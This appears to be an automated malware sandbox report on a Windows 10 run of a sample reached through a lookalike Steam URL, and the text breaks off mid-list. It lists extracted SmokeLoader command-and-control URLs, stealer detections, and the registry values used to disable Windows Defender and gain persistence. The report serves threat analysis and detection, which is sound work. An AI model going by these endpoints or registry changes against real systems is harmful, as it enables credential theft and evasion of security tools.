Resubmissions
01-10-2021 14:31
211001-rv4s3acaap 1001-10-2021 14:00
211001-ra312abhg3 1030-09-2021 18:39
210930-xa22maadgr 6Analysis
-
max time kernel
1127s -
max time network
1423s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
01-10-2021 14:31
Static task
static1
URLScan task
urlscan1
Sample
https://steamcornminuty.com/id/andreasn1xet
General
Malware Config
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Extracted
vidar
41.1
933
https://mas.to/@bardak1ho
-
profile_id
933
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6184 5620 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1352 5620 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5128 5620 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/5172-847-0x0000000005660000-0x0000000005C66000-memory.dmp family_redline -
Registers COM server for autorun 1 TTPs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 3756 created 7416 3756 WerFault.exe asRd1Lh9BjOa6OqwKJDOQ6Xi.exe -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
suricata: ET MALWARE AZORult v3.3 Server Response M3
suricata: ET MALWARE AZORult v3.3 Server Response M3
-
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE ClipBanker Variant Activity (POST)
suricata: ET MALWARE ClipBanker Variant Activity (POST)
-
suricata: ET MALWARE Fake Software Download Redirect Leading to Malware M3
suricata: ET MALWARE Fake Software Download Redirect Leading to Malware M3
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
-
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
-
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral1/memory/6060-1015-0x0000000000400000-0x00000000004D7000-memory.dmp family_vidar behavioral1/memory/6060-1010-0x0000000000740000-0x0000000000814000-memory.dmp family_vidar -
Blocklisted process makes network request 64 IoCs
Processes:
powershell.EXEschtasks.exepowershell.exeWMIC.execmd.exeMsiExec.exeflow pid process 333 6328 powershell.EXE 336 6328 powershell.EXE 338 6060 schtasks.exe 354 4216 powershell.exe 373 6060 schtasks.exe 381 6060 schtasks.exe 390 6060 schtasks.exe 390 6060 schtasks.exe 354 4216 powershell.exe 431 8332 WMIC.exe 373 6060 schtasks.exe 381 6060 schtasks.exe 490 9092 cmd.exe 493 9092 cmd.exe 518 9092 cmd.exe 520 9092 cmd.exe 636 5148 MsiExec.exe 638 5148 MsiExec.exe 640 5148 MsiExec.exe 642 5148 MsiExec.exe 647 5148 MsiExec.exe 652 5148 MsiExec.exe 653 5148 MsiExec.exe 654 5148 MsiExec.exe 655 5148 MsiExec.exe 656 5148 MsiExec.exe 657 5148 MsiExec.exe 658 5148 MsiExec.exe 661 5148 MsiExec.exe 662 5148 MsiExec.exe 664 5148 MsiExec.exe 670 5148 MsiExec.exe 671 5148 MsiExec.exe 673 5148 MsiExec.exe 674 5148 MsiExec.exe 676 5148 MsiExec.exe 677 5148 MsiExec.exe 678 5148 MsiExec.exe 679 5148 MsiExec.exe 680 5148 MsiExec.exe 681 5148 MsiExec.exe 682 5148 MsiExec.exe 683 5148 MsiExec.exe 686 5148 MsiExec.exe 687 5148 MsiExec.exe 688 5148 MsiExec.exe 690 5148 MsiExec.exe 692 5148 MsiExec.exe 697 5148 MsiExec.exe 702 5148 MsiExec.exe 703 5148 MsiExec.exe 706 5148 MsiExec.exe 707 5148 MsiExec.exe 708 5148 MsiExec.exe 709 5148 MsiExec.exe 716 5148 MsiExec.exe 717 5148 MsiExec.exe 718 5148 MsiExec.exe 720 5148 MsiExec.exe 721 5148 MsiExec.exe 727 5148 MsiExec.exe 748 5148 MsiExec.exe 750 5148 MsiExec.exe 755 5148 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
Processes:
Sayma.exeBheF7ol5r_t3Ssw6RHDGjxZj.exeSharefolder.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts Sayma.exe File opened for modification C:\Windows\system32\drivers\etc\hosts BheF7ol5r_t3Ssw6RHDGjxZj.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Sharefolder.exe -
Executes dropped EXE 64 IoCs
Processes:
ChromeRecovery.exeGoogleUpdateSetup.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleCrashHandler.exeGoogleCrashHandler64.exeGoogleUpdate.exeGoogleUpdateSetup.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeGoogleUpdate.exesetup_installer.exesetup_install.exeFri14db78c00155a.exeFri142dfd92e4.exeFri146662f370123e.exeConhost.exeFri14324d712c5d54d4.exeFri140d16d9a199.exeFri14be73761748f9bd.exeFri1425d076308.exeFri14201b9cd1.exeFri141d31513022.exeFri14def89ebdce1.exeFri14bdb9bff7a.exeFri1427fb5c3d61d6.exeFri141d31513022.tmpkeygen-pr.exekeygen-step-1.exekeygen-step-6.exekeygen-step-3.exekeygen-step-4.exeSayma.exeFri146662f370123e.exekey.exeKiffAppE2.exeSkVPVS3t6Y8W.EXeLzmwAqmV.exe6054293.scr5443599.scrChrome 5.exeDownFlSetup110.exeinst001.exeschtasks.exeShadowVPNInstaller_t3.exe6673940.scrWinHoster.exechrome.exepowershell.EXEsfx_123_206.exeforfiles.exe6761514.scrsetup_2.tmppid process 4212 ChromeRecovery.exe 3340 GoogleUpdateSetup.exe 4180 GoogleUpdate.exe 4516 GoogleUpdate.exe 4432 GoogleUpdate.exe 4468 GoogleUpdateComRegisterShell64.exe 1352 GoogleUpdateComRegisterShell64.exe 1564 GoogleUpdateComRegisterShell64.exe 4584 GoogleUpdate.exe 4920 GoogleUpdate.exe 2812 GoogleUpdate.exe 4504 GoogleCrashHandler.exe 4552 GoogleCrashHandler64.exe 4472 GoogleUpdate.exe 4528 GoogleUpdateSetup.exe 4588 GoogleUpdate.exe 4848 GoogleUpdate.exe 4184 GoogleUpdate.exe 4368 GoogleUpdateComRegisterShell64.exe 4144 GoogleUpdateComRegisterShell64.exe 3008 GoogleUpdateComRegisterShell64.exe 4536 GoogleUpdate.exe 4196 setup_installer.exe 4472 setup_install.exe 4424 Fri14db78c00155a.exe 4468 Fri142dfd92e4.exe 2036 Fri146662f370123e.exe 2820 Conhost.exe 940 Fri14324d712c5d54d4.exe 4900 Fri140d16d9a199.exe 4292 Fri14be73761748f9bd.exe 2040 Fri1425d076308.exe 4216 Fri14201b9cd1.exe 4072 Fri141d31513022.exe 3000 Fri14def89ebdce1.exe 1092 Fri14bdb9bff7a.exe 3504 Fri1427fb5c3d61d6.exe 4260 Fri141d31513022.tmp 5380 keygen-pr.exe 5388 keygen-step-1.exe 5440 keygen-step-6.exe 5448 keygen-step-3.exe 5456 keygen-step-4.exe 5464 Sayma.exe 5172 Fri146662f370123e.exe 5908 key.exe 5992 KiffAppE2.exe 6028 SkVPVS3t6Y8W.EXe 5544 LzmwAqmV.exe 5748 6054293.scr 5684 5443599.scr 4404 Chrome 5.exe 4380 DownFlSetup110.exe 4560 inst001.exe 6060 schtasks.exe 6108 ShadowVPNInstaller_t3.exe 6152 6673940.scr 6248 WinHoster.exe 6204 chrome.exe 6328 powershell.EXE 6392 sfx_123_206.exe 6452 forfiles.exe 6532 6761514.scr 6592 setup_2.tmp -
Sets file execution options in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 29 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
BiO3wpp_CDFNfV88Yvz50Dwt.exe4808953.scr6761514.scr2435700.scr1C6D.exe56BA.exeFri142dfd92e4.exerxJyBKt0ExZbSiqrhVOMbS9A.exerundll32.exe6673940.scr48iBOGFfZcAHwHGUy8oYSX3n.exe7435204.scrInstall.exeHu6UM846W1snw3koNJbBUJoj.exeInstall.exe3666041.scrdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BiO3wpp_CDFNfV88Yvz50Dwt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4808953.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6761514.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2435700.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2435700.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1C6D.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 56BA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Fri142dfd92e4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Fri142dfd92e4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4808953.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6761514.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rxJyBKt0ExZbSiqrhVOMbS9A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 56BA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6673940.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 48iBOGFfZcAHwHGUy8oYSX3n.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 48iBOGFfZcAHwHGUy8oYSX3n.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7435204.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1C6D.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6673940.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7435204.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BiO3wpp_CDFNfV88Yvz50Dwt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Hu6UM846W1snw3koNJbBUJoj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3666041.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rxJyBKt0ExZbSiqrhVOMbS9A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3666041.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Hu6UM846W1snw3koNJbBUJoj.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Fri1425d076308.exeBiguvajula.exeWMIC.exeqT3dWYBP7ZsuOrwW4ZcUbjl6.exeKilaekovase.exencZxzUl.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Fri1425d076308.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Biguvajula.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation WMIC.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation qT3dWYBP7ZsuOrwW4ZcUbjl6.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Kilaekovase.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation ncZxzUl.exe -
Loads dropped DLL 64 IoCs
Processes:
GoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeGoogleUpdate.exesetup_install.exeFri141d31513022.tmpkeygen-step-1.exesetup_2.tmpsetup_2.tmprundll32.exeLzmwAqmV.exerundll32.exeinstaller.tmpShadowVPNInstaller_t3.exeschtasks.exepid process 4180 GoogleUpdate.exe 4516 GoogleUpdate.exe 4432 GoogleUpdate.exe 4468 GoogleUpdateComRegisterShell64.exe 4432 GoogleUpdate.exe 1352 GoogleUpdateComRegisterShell64.exe 4432 GoogleUpdate.exe 1564 GoogleUpdateComRegisterShell64.exe 4432 GoogleUpdate.exe 4584 GoogleUpdate.exe 4920 GoogleUpdate.exe 2812 GoogleUpdate.exe 2812 GoogleUpdate.exe 4920 GoogleUpdate.exe 4472 GoogleUpdate.exe 4588 GoogleUpdate.exe 4848 GoogleUpdate.exe 4184 GoogleUpdate.exe 4368 GoogleUpdateComRegisterShell64.exe 4184 GoogleUpdate.exe 4144 GoogleUpdateComRegisterShell64.exe 4184 GoogleUpdate.exe 3008 GoogleUpdateComRegisterShell64.exe 4184 GoogleUpdate.exe 4536 GoogleUpdate.exe 4472 setup_install.exe 4472 setup_install.exe 4472 setup_install.exe 4472 setup_install.exe 4472 setup_install.exe 4472 setup_install.exe 4260 Fri141d31513022.tmp 5388 keygen-step-1.exe 5388 keygen-step-1.exe 5388 keygen-step-1.exe 5388 keygen-step-1.exe 6592 setup_2.tmp 7084 setup_2.tmp 6320 rundll32.exe 5928 LzmwAqmV.exe 5928 LzmwAqmV.exe 5928 LzmwAqmV.exe 5928 LzmwAqmV.exe 5928 LzmwAqmV.exe 5928 LzmwAqmV.exe 5928 LzmwAqmV.exe 5928 LzmwAqmV.exe 5928 LzmwAqmV.exe 5928 LzmwAqmV.exe 5928 LzmwAqmV.exe 5928 LzmwAqmV.exe 5928 LzmwAqmV.exe 7496 rundll32.exe 5928 LzmwAqmV.exe 5928 LzmwAqmV.exe 5928 LzmwAqmV.exe 5928 LzmwAqmV.exe 5928 LzmwAqmV.exe 7876 installer.tmp 6108 ShadowVPNInstaller_t3.exe 6108 ShadowVPNInstaller_t3.exe 6108 ShadowVPNInstaller_t3.exe 6060 schtasks.exe 6060 schtasks.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
BB3.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" BB3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" BB3.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions BB3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\BB3.exe = "0" BB3.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection BB3.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features BB3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" BB3.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths BB3.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet BB3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" BB3.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
5443599.scrSayma.exeSharefolder.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 5443599.scr Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\ZHaepivalafae.exe\"" Sayma.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MSBuild\\Movynofokae.exe\"" Sharefolder.exe -
Checks for any installed AV software in registry 1 TTPs 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
2435700.scr1C6D.exe56BA.exeFri142dfd92e4.exe6761514.scrrxJyBKt0ExZbSiqrhVOMbS9A.exeHu6UM846W1snw3koNJbBUJoj.exeBiO3wpp_CDFNfV88Yvz50Dwt.exe7435204.scr3666041.scr48iBOGFfZcAHwHGUy8oYSX3n.exeG0BIQuPDVqp6W8vb29KhvdSC.exe6673940.scr4808953.scrdescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2435700.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1C6D.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 56BA.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Fri142dfd92e4.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6761514.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rxJyBKt0ExZbSiqrhVOMbS9A.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Hu6UM846W1snw3koNJbBUJoj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA BiO3wpp_CDFNfV88Yvz50Dwt.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7435204.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3666041.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 48iBOGFfZcAHwHGUy8oYSX3n.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA G0BIQuPDVqp6W8vb29KhvdSC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6673940.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4808953.scr -
Drops Chrome extension 3 IoCs
Processes:
ncZxzUl.exeFri14bdb9bff7a.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gakekacnalcpkgkogmbmknlcdikjghba\2.5_0\manifest.json ncZxzUl.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json ncZxzUl.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json Fri14bdb9bff7a.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini svchost.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exeinstaller.exeinstaller.exedescription ioc process File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 325 ipinfo.io 326 ipinfo.io 342 ip-api.com 505 ipinfo.io 506 ipinfo.io 558 ipinfo.io 284 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
6F72.exedescription ioc process File opened for modification \??\PHYSICALDRIVE0 6F72.exe -
Drops file in System32 directory 64 IoCs
Processes:
svchost.exesvchost.exebackgroundTaskHost.exencZxzUl.exepowershell.exepowershell.exerundll32.exerundll32.exeschtasks.exepowershell.exerundll32.exeInstall.exeWMIC.exeInstall.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\System32\Tasks\PowerControl HR svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log backgroundTaskHost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache ncZxzUl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ncZxzUl.exe File opened for modification C:\Windows\System32\Tasks\sQKEyxOvETjkhD svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 ncZxzUl.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 6A14C6481B2C8C02 svchost.exe File opened for modification C:\Windows\System32\Tasks\grUXVILUo svchost.exe File opened for modification C:\Windows\System32\Tasks\YqJChhYnTMHzkMjCc svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 ncZxzUl.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ncZxzUl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ncZxzUl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File opened for modification C:\Windows\System32\Tasks\EhdpuqeT svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ncZxzUl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_BE9EEF936EC97838527255B8F50AE885 ncZxzUl.exe File opened for modification C:\Windows\System32\Tasks\RulYNORIEfYpYdh2 svchost.exe File opened for modification C:\Windows\System32\Tasks\cXKEjEvxPbALHdiUE2 svchost.exe File opened for modification C:\Windows\System32\Tasks\gzaEvFAgj svchost.exe File opened for modification 